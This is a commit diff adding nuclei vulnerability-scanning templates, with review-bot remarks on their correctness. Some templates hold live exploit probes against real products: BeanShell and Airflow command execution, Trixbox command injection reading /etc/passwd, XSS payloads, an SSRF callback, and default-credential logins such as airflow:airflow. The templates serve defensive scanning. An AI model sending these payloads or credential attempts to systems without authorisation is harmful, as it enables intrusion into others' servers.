Merge pull request #55 from projectdiscovery/master

Update
patch-1
Dhiyaneshwaran 2021-06-05 13:35:20 +05:30 committed by GitHub
commit ac8029636e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
72 changed files with 1389 additions and 106 deletions


@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | 321 | vulnerabilities | 170 | exposed-panels | 137 |
| takeovers | 67 | exposures | 104 | technologies | 77 |
| misconfiguration | 66 | workflows | 31 | miscellaneous | 22 |
| default-logins | 28 | exposed-tokens | 0 | dns | 8 |
| fuzzing | 9 | helpers | 8 | iot | 12 |
| cves | 329 | vulnerabilities | 175 | exposed-panels | 146 |
| takeovers | 67 | exposures | 105 | technologies | 98 |
| misconfiguration | 66 | workflows | 32 | miscellaneous | 22 |
| default-logins | 30 | exposed-tokens | 0 | dns | 9 |
| fuzzing | 9 | helpers | 8 | iot | 13 |
**108 directories, 1148 files**.
**111 directories, 1207 files**.
</td>
</tr>


@ -1,11 +1,12 @@
id: xiuno-bbs-reinstallation
id: CNVD-2019-01348
info:
name: Xiuno BBS CNVD-2019-01348
author: princechaddha
severity: medium
description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page.
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
tags: xiuno
tags: xiuno,cnvd
requests:
- method: GET


@ -1,16 +1,18 @@
id: xunchi-file-read
id: CNVD-2020-23735
info:
name: Xxunchi LFR (CNVD-2019-01348
name: Xxunchi Local File read
author: princechaddha
severity: medium
description: Xunyou cms has an arbitrary file reading vulnerability. Attackers can use vulnerabilities to obtain sensitive information.
reference: https://www.cnvd.org.cn/flaw/show/2025171
tags: xunchi,lfi
tags: xunchi,lfi,cnvd
requests:
- method: GET
path:
- "{{BaseURL}}/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php"
matchers-condition: and
matchers:
- type: status
@ -21,4 +23,4 @@ requests:
- "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N"
- "display_errors"
part: body
condition: and
condition: and
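Review bot: The product is spelled three different ways in this template — `Xxunchi` in the new `name:` value, `xunchi` in the tags, and `Xunyou cms` in the description — so the name should read `name: Xunchi Local File Read` (or whichever spelling the vendor uses) and the description should agree with it. The reference `https://www.cnvd.org.cn/flaw/show/2025171` also does not follow the `flaw/show/CNVD-…` form the sibling CNVD templates in this commit use, so it is worth confirming it resolves to CNVD-2020-23735. The matcher block starts in the first hunk and continues outside it.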


@ -1,11 +1,11 @@
id: ruijie-smartweb-default-password
id: CNVD-2020-56167
info:
name: Ruijie Smartweb Default Password
author: pikpikcu
severity: low
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167
tags: ruijie,default-login
tags: ruijie,default-login,cnvd
requests:
- method: POST


@ -5,7 +5,7 @@ info:
author: pikpikcu
severity: medium
reference: https://blog.csdn.net/m0_46257936/article/details/113150699
tags: lfi
tags: lfi,cnvd
requests:
- method: GET


@ -1,11 +1,11 @@
id: weiphp-path-traversal
id: CNVD-2020-68596
info:
name: WeiPHP 5.0 Path Traversal
author: pikpikcu
severity: critical
reference: http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html
tags: weiphp,lfi
tags: weiphp,lfi,cnvd
requests:
- raw:


@ -1,11 +1,11 @@
id: eea-disclosure
id: CNVD-2021-10543
info:
name: EEA Information Disclosure
author: pikpikcu
severity: high
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543
tags: config,exposure
tags: config,exposure,cnvd
requests:
- method: GET


@ -1,11 +1,11 @@
id: ruijie-smartweb-disclosure
id: CNVD-2021-17369
info:
name: Ruijie Smartweb Management System Password Information Disclosure
author: pikpikcu
severity: medium
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369
tags: ruijie,disclosure
tags: ruijie,disclosure,cnvd
requests:
- method: GET

cnvd/CNVD-2021-30167.yaml Normal file

@ -0,0 +1,45 @@
id: CNVD-2021-30167
info:
name: UFIDA NC BeanShell Remote Code Execution
author: pikpikcu
severity: high
reference: |
- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
- https://www.cnvd.org.cn/webinfo/show/6491
tags: beanshell,rce,cnvd
requests:
- raw:
- | #linux
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Type: application/x-www-form-urlencoded
bsh.script=exec("id");
- | #windows
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Type: application/x-www-form-urlencoded
bsh.script=exec("ipconfig");
matchers-condition: and
matchers:
- type: regex
regex:
- "uid="
- "Windows IP"
condition: or
- type: word
words:
- "BeanShell Test Servlet"
- type: status
status:
- 200
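Review bot: `reference: |` produces one multi-line string whose lines happen to begin with `- `, not a YAML sequence, so a consumer that expects a list of URLs receives a single blob; writing it as `reference:` followed by real `- https://…` items is unambiguous and matches the scalar form used in CVE-2020-6308. The same block-scalar form appears in CVE-2017-14535, CVE-2017-3528, CVE-2020-11978, CVE-2021-21985, CVE-2021-24316 and the Telerik change in this commit. The `#linux` / `#windows` comments after the `|` indicator are legal YAML but would read better above each `- |` item, together with a one-line note that the probe executes `id` / `ipconfig` on the target so operators can judge its intrusiveness.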


@ -0,0 +1,32 @@
id: CVE-2017-14535
info:
name: Trixbox - 2.8.0.4 OS Command Injection Vulnerability
author: pikpikcu
severity: high
reference: |
- https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/
- https://www.exploit-db.com/exploits/49913
tags: cve,cve2017,trixbox,rce
requests:
- raw:
- |
GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
Connection: close
Cache-Control: max-age=0
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
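Review bot: The `Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=` header hard-codes a credential pair (it decodes to `maint:password`), so the check only fires on hosts that still accept that account, and nothing in the template says so. Add a comment above the header such as `# presumed default credentials for the maint account; hosts that changed them answer 401 and are not reported` and consider stating the precondition in `description:`. The `[x*]` class in the passwd regex is correct as written (it accepts `x` or `*`), but it is repeated verbatim across several new templates here; a shared note on why both forms are accepted would help the next reader.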


@ -0,0 +1,21 @@
id: CVE-2017-3528
info:
name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect
author: 0x_Akoko
severity: low
reference: |
- https://blog.zsec.uk/cve-2017-3528/
- https://www.exploit-db.com/exploits/43592
tags: oracle,redirect
requests:
- method: GET
path:
- "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com"
matchers:
- type: word
words:
- 'noresize src="/\example.com?configName='
part: body
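Review bot: `tags: oracle,redirect` omits the `cve,cve2017` tags that every other CVE template in this commit carries (compare `tags: cve,cve2017,trixbox,rce` in CVE-2017-14535), so `-tags cve` runs will skip this template; change it to `tags: cve,cve2017,oracle,redirect`. There is no status matcher either, but the body word `noresize src="/\example.com?configName=` is specific enough that this is acceptable.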


@ -11,12 +11,16 @@ requests:
- method: GET
path:
- "{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions"
headers:
Accept-Encoding: deflate
matchers-condition: and
matchers:
- type: word
words:
- "///sessions"
part: body
- type: status
status:
- 200
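Review bot: The new `Accept-Encoding: deflate` header is unexplained; a reader cannot tell whether it is there so the `///sessions` word matcher sees an uncompressed body or for some server-side reason. Add a one-line comment above it, e.g. `# ask for a non-gzip body so the word matcher sees the raw listing — confirm this is why the header was added`. The request block begins outside the hunk.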


@ -1,4 +1,4 @@
id: circarlife-system-log
id: CVE-2018-12634
info:
name: Exposed CirCarLife System Log
@ -6,7 +6,7 @@ info:
description: CirCarLife is an internet-connected electric vehicle charging station
reference: https://circontrol.com/
severity: medium
tags: scada,circontrol,circarlife,logs
tags: cve,cve2018,scada,circontrol,circarlife,logs
requests:
- method: GET


@ -0,0 +1,64 @@
id: CVE-2020-11978
info:
name: Apache Airflow <= 1.10.10 - 'Example Dag' Remote Code Execution
author: pdteam
severity: high
description: An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.
reference: |
- https://github.com/pberba/CVE-2020-11978
- https://nvd.nist.gov/vuln/detail/CVE-2020-11978
- https://twitter.com/wugeej/status/1400336603604668418
tags: cve,cve2020,apache,airflow,rce
requests:
- raw:
- |
GET /api/experimental/test HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
- |
GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
- |
POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
Content-Length: 85
Content-Type: application/json
{"conf": {"message": "\"; touch test #"}}
- |
GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
extractors:
- type: regex
name: exec_date
part: body
group: 1
internal: true
regex:
- '"execution_date":"([0-9-A-Z:+]+)"'
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(body_4, "operator":"BashOperator")'
- 'contains(all_headers_4, "application/json")'
condition: and
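Review bot: The first DSL matcher, `contains(body_4, "operator":"BashOperator")`, has its inner quotes unescaped, so the expression is two string literals separated by a bare `:`; in the govaluate syntax nuclei's DSL uses, `:` is the ternary separator, so this most likely fails to compile and silently disables the whole `and` chain — escape the inner quotes: `- 'contains(body_4, "\"operator\":\"BashOperator\"")'`. Separately, the `conf.message` payload `\"; touch test #` creates a file named `test` in the worker's working directory, a side effect the template never documents; a header comment stating it would let operators decide whether to run it. The hard-coded `Content-Length: 85` also does not match the 41-byte JSON body; nuclei recomputes the length for non-unsafe raw requests as far as I know, so this is misleading rather than breaking, but it should be removed or corrected.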


@ -1,18 +1,20 @@
id: airflow-api-exposure
id: CVE-2020-13927
info:
name: Apache Airflow API Exposure / Unauthenticated Access
name: Unauthenticated Airflow Experimental REST API
author: pdteam
severity: medium
tags: apache,airflow,unauth
tags: cve,cve2020,apache,airflow,unauth
requests:
- method: GET
path:
- '{{BaseURL}}/api/experimental/latest_runs'
matchers:
- type: word
words:
- '"dag_run_url":'
- '{"items":['
- '"dag_id":'
- '"items":'
condition: and


@ -3,7 +3,7 @@ id: CVE-2020-36112
info:
name: CSE Bookstore 1.0 SQL Injection
author: geeknik
description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successfull exploitation of this vulnerability will lead to an attacker dumping the entire database.
description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database.
reference: |
- https://www.exploit-db.com/exploits/49314
- https://www.tenable.com/cve/CVE-2020-36112


@ -0,0 +1,21 @@
id: CVE-2020-6308
info:
name: Unauthenticated Blind SSRF in SAP
author: madrobot
severity: medium
reference: https://github.com/InitRoot/CVE-2020-6308-PoC
tags: cve,cve2020,sap,ssrf,oob
requests:
- method: POST
path:
- '{{BaseURL}}/AdminTools/querybuilder/logon?framework='
body: aps={{interactsh-url}}&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"


@ -0,0 +1,31 @@
id: CVE-2021-21985
info:
name: VMware vSphere Client (HTML5) RCE
author: D0rkerDevil
severity: critical
description: |
The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2021-21985
- https://www.vmware.com/security/advisories/VMSA-2021-0010.html
- https://github.com/alt3kx/CVE-2021-21985_PoC
tags: cve,cve2021,rce,vsphere
requests:
- raw:
- |
POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/json
Content-Length: 86
Connection: close
{"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]}
matchers:
- type: word
words:
- '{"result":{"isDisconnected":'
part: body
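Review bot: The only matcher, `{"result":{"isDisconnected":`, shows that the vSAN health proxy endpoint answers an unauthenticated request; it does not demonstrate code execution, yet `name:` says RCE and `severity: critical`. A comment above `matchers:` such as `# detects the unauthenticated vSAN health endpoint addressed by VMSA-2021-0010; does not execute code` would stop readers over-interpreting a hit. Adding a `type: status` / `200` matcher under `matchers-condition: and`, as the sibling templates do, would also tighten the check.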


@ -23,6 +23,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}/error3?msg=30&data=';alert('nuclei');//"
- "{{BaseURL}}/omni_success?cmdb_edit_path=\");alert('nuclei');//"
matchers-condition: and
matchers:
- type: word
@ -30,4 +31,4 @@ requests:
- "nuclei"
- "No policy has been chosen."
condition: and
part: body
part: body


@ -0,0 +1,34 @@
id: CVE-2021-24316
info:
author: 0x_Akoko
description: Mediumish WordPress Theme <= 1.0.47 - Unauthenticated Reflected XSS & XFS.
name: An Unauthenticated Reflected XSS & XFS Mediumish theme through 1.0.47 for WordPress
severity: medium
tags: cve,cve2021,mediumish,xss,wordpress
reference: |
- https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e
- https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt
requests:
- method: GET
path:
- '{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E '
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<script>alert(/{{randstr}}/)</script>"
- "Sorry, no posts matched your criteria."
part: body
condition: and
- type: word
words:
- "text/html"
part: header
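Review bot: The request path ends with a space inside the single quotes (`…%3C/script%3E '`), so nuclei sends a URL with a trailing blank or `%20`, which may make the reflection check miss on servers that treat the suffix strictly; drop the space. `name:` and `description:` also look swapped — `name:` holds a full sentence and `description:` holds the short title — compare the ordering in the other templates of this commit. Whether `{{randstr}}` is substituted inside matcher `words:` should be confirmed against the nuclei version this repository targets; if it is not, the body matcher never fires.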


@ -0,0 +1,61 @@
id: airflow-default-credentials
info:
name: Apache Airflow Default Credentials
author: pdteam
severity: critical
tags: airflow,default-login
reference: https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html
requests:
- raw:
- |
GET /admin/airflow/login HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
- |
POST /admin/airflow/login HTTP/1.1
Host: {{Hostname}}
Content-Length: 152
Cache-Control: max-age=0
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}/admin/airflow/login
Accept-Encoding: gzip, deflate
Accept-Language: en-IN,en;q=0.9
Connection: close
username=airflow&password=airflow&_csrf_token={{csrf_token}}
extractors:
- type: regex
name: csrf_token
group: 1
part: body
internal: true
regex:
- 'csrf_token" type="hidden" value="([A-Za-z0-9.-]+)">'
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
words:
- "session=."
- "/admin/"
part: header
condition: and
- type: word
words:
- 'You should be redirected automatically to target URL: <a href="/admin/">/admin/</a>'
part: body
- type: status
status:
- 302
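Review bot: The header word `session=.` only matches when the Flask session cookie value begins with a literal dot, which itsdangerous adds only for compressed payloads, so successful logins that produce an uncompressed cookie are missed; if the intent is "a session cookie was set", use `- "session="`. The hard-coded `Content-Length: 152` cannot be right for a body whose `{{csrf_token}}` varies in length — nuclei recomputes it for raw requests as far as I know, so prefer dropping the header. A comment above the POST noting that the probe attempts a login with `airflow:airflow` (presumably the credentials the referenced docker quick-start page documents) would also help operators.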


@ -0,0 +1,29 @@
id: arl-default-password
info:
name: ARL Default Password
author: pikpikcu
severity: high
tags: arl,default-login
requests:
- method: POST
path:
- "{{BaseURL}}/api/user/login"
headers:
Content-Type: application/json; charset=UTF-8
body: |
{"username":"admin","password":"arlpass"}
matchers-condition: and
matchers:
- type: word
words:
- '"message": "success"'
- '"username": "admin"'
- '"type": "login"'
condition: and
- type: status
status:
- 200


@ -0,0 +1,33 @@
id: szhe-default-password
info:
name: Szhe Default Password
author: pikpikcu
severity: low
tags: szhe,default-login
vendor: https://github.com/Cl0udG0d/SZhe_Scan
requests:
- method: POST
path:
- "{{BaseURL}}/login/"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
email=springbird@qq.com&password=springbird&remeber=true
matchers-condition: and
matchers:
- type: word
words:
- 'You should be redirected automatically to target URL: <a href="/">/</a>'
- type: word
words:
- 'Set-Cookie: session'
part: header
- type: status
status:
- 302
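Review bot: `vendor:` is not an `info` key used anywhere else in this commit (`reference:` is), so the URL will be ignored by tooling that reads references; change it to `reference: https://github.com/Cl0udG0d/SZhe_Scan`. `body: |` also appends a newline to the form body, so the last field is sent as `remeber=true\n`; use `body: |-` (or a plain quoted scalar), since form-encoded bodies should not end in a line break. The same `body: |` pattern appears in arl-default-password, where the trailing newline after a JSON body is harmless.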

dns/dns-waf-detect.yaml Normal file

@ -0,0 +1,172 @@
id: dns-waf-detect
info:
name: DNS WAF Detection
author: lu4nx
severity: info
tags: tech,waf,dns
dns:
- name: "{{FQDN}}"
type: CNAME
recursion: true
retries: 5
class: inet
- name: "{{FQDN}}"
type: NS
recursion: true
retries: 5
class: inet
matchers:
- type: word
name: sanfor-shield
words:
- ".sangfordns.com"
- type: word
name: 360panyun
words:
- ".360panyun.com"
- type: word
name: baiduyun
words:
- ".yunjiasu-cdn.net"
- type: word
name: chuangyudun
words:
- ".365cyd.cn"
- ".cyudun.net"
- type: word
name: knownsec
words:
- ".jiashule.com"
- ".jiasule.org"
- type: word
name: huaweicloud
words:
- ".huaweicloudwaf.com"
- type: word
name: xinliuyun
words:
- ".ngaagslb.cn"
- type: word
name: chinacache
words:
- ".chinacache.net"
- ".ccgslb.net"
- type: word
name: nscloudwaf
words:
- ".nscloudwaf.com"
- type: word
name: wangsu
words:
- ".wsssec.com"
- ".lxdns.com"
- ".wscdns.com"
- ".cdn20.com"
- ".cdn30.com"
- ".ourplat.net"
- ".wsdvs.com"
- ".wsglb0.com"
- ".wswebcdn.com"
- ".wswebpic.com"
- ".wsssec.com"
- ".wscloudcdn.com"
- ".mwcloudcdn.com"
- type: word
name: qianxin
words:
- ".360safedns.com"
- ".360cloudwaf.com"
- type: word
name: baiduyunjiasu
words:
- ".yunjiasu-cdn.net"
- type: word
name: anquanbao
words:
- ".anquanbao.net"
- type: regex
name: aliyun
regex:
- '\.w\.kunlun\w{2,3}\.com'
- type: regex
name: aliyun-waf
regex:
- '\.aliyunddos\d+\.com'
- '\.aliyunwaf\.com'
- '\.aligaofang\.com'
- '\.aliyundunwaf\.com'
- type: word
name: xuanwudun
words:
- ".saaswaf.com"
- ".dbappwaf.cn"
- type: word
name: yundun
words:
- ".hwwsdns.cn"
- ".yunduncname.com"
- type: word
name: knownsec-ns
words:
- ".jiasule.net"
- type: word
name: chuangyudun
words:
- ".365cyd.net"
- type: word
name: qianxin
words:
- ".360wzb.com"
- type: word
name: anquanbao
words:
- ".anquanbao.com"
- type: word
name: wangsu
words:
- ".chinanetcenter.com"
- type: word
name: baiduyunjiasue
words:
- ".ns.yunjiasu.com"
- type: word
name: chinacache
words:
- ".chinacache.com"
- type: word
name: cloudflare
words:
- "ns.cloudflare.com"
- type: word
name: edns
words:
- ".iidns.com"
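Review bot: Several matcher names are reused — `chuangyudun`, `wangsu`, `qianxin`, `anquanbao` and `chinacache` each appear twice — and `baiduyun` and `baiduyunjiasu` both match `.yunjiasu-cdn.net`, while `.wsssec.com` is listed twice under the first `wangsu`; nuclei reports the matcher `name` on a hit, so duplicate names make results ambiguous and the repeated domains add nothing. Merge each pair into one matcher with a combined `words:` list. `baiduyunjiasue` and `sanfor-shield` look like typos for `baiduyunjiasu` and `sangfor-shield`.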


@ -1,19 +0,0 @@
id: airflow-exposure
info:
name: Apache Airflow Exposure / Unauthenticated Access
author: pdteam
severity: medium
tags: panel
requests:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/admin/'
matchers:
- type: word
words:
- '<title>Airflow - DAGs</title>'
- '<a href="https://github.com/apache/airflow">'
condition: and


@ -0,0 +1,24 @@
id: airflow-panel
info:
name: Airflow Admin login
author: pdteam
severity: info
tags: panel,apache,airflow
requests:
- method: GET
path:
- "{{BaseURL}}/admin/airflow/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Airflow - Login"
- type: status
status:
- 200


@ -0,0 +1,23 @@
id: clave-login-panel
info:
name: Clave login panel
author: __Fazal
severity: info
tags: panel,clave
requests:
- method: GET
path:
- '{{BaseURL}}/admin.php'
redirects: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Clave"
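Review bot: The body word `Clave` is the only fingerprint and is a plain dictionary word, so with `redirects: true` any page that mentions it — including unrelated content reached after a redirect — is reported as a Clave panel. Prefer a marker specific to the login page (a `<title>` string or a form field name taken from a known instance, to be confirmed) or add a second word under `condition: and`.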


@ -0,0 +1,18 @@
id: dotcms-admin-panel
info:
name: dotAdmin Panel
author: impramodsargar
severity: info
tags: panel
requests:
- method: GET
path:
- "{{BaseURL}}/dotAdmin/"
matchers-condition: and
matchers:
- type: word
words:
- '<title>dotCMS Content Management Platform</title>'
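Review bot: `tags: panel` carries no product tag, unlike the sibling panel templates in this commit (`panel,clave`, `panel,ems`, `panel,zenario`); use `tags: panel,dotcms`. A `type: status` matcher for `200` under the existing `matchers-condition: and` would also bring it in line with those templates.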


@ -0,0 +1,22 @@
id: ems-login-panel
info:
name: EMS Login page detection
author: __Fazal
severity: info
tags: panel,ems
requests:
- method: GET
path:
- '{{BaseURL}}/EMSWebClient/Login.aspx'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "EMS Web Client - Login"


@ -0,0 +1,22 @@
id: lancom-router-panel
info:
name: Lancom Router Panel
author: __Fazal
severity: info
tags: panel,lancom
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "LANCOM 1790VA-4G"
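Review bot: The fingerprint `LANCOM 1790VA-4G` is a single model string while `name:` and `id:` describe a generic Lancom router panel, so other Lancom models never match and a hit reports a model the name does not mention. Either rename the template to the model or match a vendor-wide marker (for example a `LANCOM` string that every firmware's login page carries — to be confirmed against real devices).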


@ -0,0 +1,23 @@
id: luci-login-detection
info:
name: LuCi Login Detector
author: aashiq
severity: info
description: Searches for LuCi Login pages by attempting to query the cgi-bin endpoint
tags: login
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/luci"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Authorization Required"
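Review bot: `tags: login` departs from the `panel,<product>` convention the other panel templates in this commit follow; use `tags: panel,luci`. The `200` status requirement may also be too strict — as far as I recall LuCI answers an unauthenticated `/cgi-bin/luci` with a 403 while still rendering the `Authorization Required` text — so confirm the status against a real device or drop the status matcher.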


@ -0,0 +1,22 @@
id: openerp-database
info:
name: OpenERP database instances
author: impramodsargar
severity: info
tags: openerp
requests:
- method: GET
path:
- "{{BaseURL}}/web/database/selector/"
matchers-condition: and
matchers:
- type: word
words:
- '<title>Odoo</title>'
- type: status
status:
- 200
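Review bot: The template is named and tagged `openerp`, but its only fingerprint is `<title>Odoo</title>`, the product's current name, so a search for Odoo templates will not find it; add `odoo` (and `panel`, since this detects a database selector page) to the tags: `tags: panel,openerp,odoo`.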


@ -0,0 +1,23 @@
id: servicedesk-login-panel
info:
name: Servicedesk Login Panel Detector
author: aashiq
severity: info
description: Searches for ServiceDesk login panels by trying to query the "/servicedesk/customer/user/login" endpoint
tags: servicedesk,confluence,jira,panel
requests:
- method: GET
path:
- "{{BaseURL}}/servicedesk/customer/user/login"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "https://confluence.atlassian.com"
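Review bot: The body word `https://confluence.atlassian.com` is a generic Atlassian footer link that appears on many Jira and Confluence pages, so any Atlassian product answering `200` on that path could be reported as a Service Desk login panel. Pair it with a Service Desk-specific string under `condition: and` (a `<title>` or portal markup from a known instance, to be confirmed), or drop the generic link.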


@ -0,0 +1,22 @@
id: synnefo-admin-panel
info:
name: Synnefo Admin Panel Exposure
author: impramodsargar
severity: info
tags: panel,synnefo
requests:
- method: GET
path:
- "{{BaseURL}}/synnefoclient/"
matchers-condition: and
matchers:
- type: word
words:
- '<title>Synnefo Admin</title>'
- type: status
status:
- 200


@ -0,0 +1,22 @@
id: zenario-login-panel
info:
name: Zenario Admin login
author: __Fazal
severity: info
tags: panel,zenario
requests:
- method: GET
path:
- '{{BaseURL}}/zenario/admin/welcome.php'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Welcome to Zenario"


@ -30,12 +30,15 @@ requests:
- "{{BaseURL}}/wp-content/uploads/dump.sql"
headers:
Range: "bytes=0-3000"
max-size: 2000 # Size in bytes - Max Size to read from server response
matchers-condition: and
matchers:
- type: regex
regex:
- "(?m)(?:DROP|CREATE|(?:UN)?LOCK) TABLE|INSERT INTO"
part: body
- type: status
status:
- 200
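Review bot: The new `max-size: 2000` reads only the first 2000 bytes of the response while the `Range: "bytes=0-3000"` header still asks the server for 3001, so the two limits disagree and the regex sees less than the header suggests. Align them (`max-size: 3001` or `Range: "bytes=0-1999"`) and extend the inline comment to say which limit governs. The request block begins outside the hunk.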


@ -32,6 +32,8 @@ requests:
- "{{BaseURL}}/{{Hostname}}.sql.zip"
- "{{BaseURL}}/{{Hostname}}.sql.z"
- "{{BaseURL}}/{{Hostname}}.sql.tar.z"
max-size: 500 # Size in bytes - Max Size to read from server response
matchers-condition: and
matchers:
- type: binary
@ -49,10 +51,12 @@ requests:
- "504B0304" # zip
condition: or
part: body
- type: regex
regex:
- "application/[-\\w.]+"
part: header
- type: status
status:
- 200


@ -4,7 +4,7 @@ info:
name: Apache Airflow Configuration Exposure
author: pdteam
severity: medium
tags: exposure,config
tags: exposure,config,airflow,apache
requests:
- method: GET


@ -0,0 +1,25 @@
id: detect-drone-config
info:
name: Detect Drone Configuration
author: geeknik
description: Drone is a Container-Native, Continuous Delivery Platform -- https://github.com/drone/drone
severity: high
tags: config,exposure,drone
requests:
- method: GET
path:
- "{{BaseURL}}/.drone.yml"
matchers-condition: and
matchers:
- type: word
words:
- "kind:"
- "name:"
- "steps:"
condition: and
- type: status
status:
- 200


@ -18,8 +18,13 @@ requests:
words:
- "parent_location"
- "push_location"
condition: and
condition: or
- type: status
status:
- 200
- type: word
part: header
words:
- "text/plain"


@ -4,14 +4,12 @@ info:
name: Exposed SVN Directory
author: udit_thakkur & dwisiswant0
severity: medium
tags: config,exposure
tags: config,exposure,svn
requests:
- method: GET
path:
- "{{BaseURL}}/.svn/entries"
- "{{BaseURL}}/.svn/prop-base/"
- "{{BaseURL}}/.svn/text-base/"
matchers-condition: and
matchers:
@ -19,10 +17,12 @@ requests:
part: body
regex:
- "(^10\\s*dir|\\.svn-base|has-props|svn:\\/\\/|([\\da-f]{32}[\\S+\\r\\n\\s]+[\\d]{4}-[\\d]{2}-[\\d]{2}T[\\d]{2}:[\\d]{2}:[\\d]{2}.[\\d]{6}Z))"
- type: status
status:
- 200
- type: dsl
dsl:
- 'contains(tolower(body), "<html") == false && contains(tolower(body), "</body>") == false'
- type: word
part: header
words:
- "text/plain"
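Review bot: The added `text/plain` header matcher assumes the server labels the extension-less `.svn/entries` file as text; Apache commonly does, but nginx's default for unknown types is `application/octet-stream`, so this may turn true positives into misses on nginx hosts. Consider `condition: or` with `application/octet-stream`, or rely on the new DSL not-HTML check alone. The same `text/plain` requirement is added to the `parent_location` / `push_location` template and the `Repository not found` takeover template in this commit. The matcher block begins outside this hunk.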


@ -0,0 +1,18 @@
id: exposed-vscode
info:
name: Exposed VSCode Folders
author: aashiq
severity: low
